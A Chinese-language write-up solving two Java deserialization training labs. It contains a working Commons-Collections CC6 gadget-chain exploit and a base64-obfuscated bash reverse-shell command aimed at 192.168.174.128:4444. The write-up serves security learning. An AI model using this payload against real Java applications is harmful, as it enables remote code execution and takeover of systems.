javaDeserializeLabs1，2

Xi4nb3i

2022-06-01

javaSec

简介

项目地址：https://github.com/waderwu/javaDeserializeLabs

其中涉及的知识面仍有未涉及部分，小目标：想在这学期离校前把他做完。

Lab1-basic

import com.utils.Utils;
import com.yxxx.javasec.deserialize.Calc;

import java.lang.reflect.Field;

public class Lab1 {
    public static void main(String[] args) throws Exception {
        Calc calc = new Calc();
        setFieldValue(calc,"canPopCalc",true);
        setFieldValue(calc,"cmd","bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}");
        System.out.println(Utils.objectToHexString(calc));
    }

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

利用细节：

jdk版本要和目标机器相同
calc类的包路径也要和目标一样
要反射修改域值

Lab2-ysoserial_Web

查看pom.xml，存在commons-collections3.2.1组件，

<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.2.1</version>
</dependency>

用cc6，hashmap型，在shiro里面也自己构造过，就直接拿过来用了

package com.payload.lab2;

import com.utils.Utils;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class Lab2 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException {
        String command = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}";
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] { String.class,
                        Class[].class }, new Object[] { "getRuntime",
                        new Class[0] }),
                new InvokerTransformer("invoke", new Class[] { Object.class,
                        Object[].class }, new Object[] { null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] { String.class },
                        new String[] { command }),
                new ConstantTransformer(1),
        };
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

        Map expMap = new HashMap();
        expMap.put(tme, "valuevalue");

        outerMap.remove("keykey");

        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);

        objectOutputStream.writeUTF("SJTU");
        objectOutputStream.writeInt(1896);
        objectOutputStream.writeObject(expMap);

        System.out.println(Utils.bytesTohexString(byteArrayOutputStream.toByteArray()));
    }
}

细节：

最后objectOutputStream.writeUTF和objectOutputStream.writeInt要注意顺序，如果将writeObject放在前面会导致利用不成功。

序列化中遇到的常见问题：https://juejin.cn/post/6844903848167866375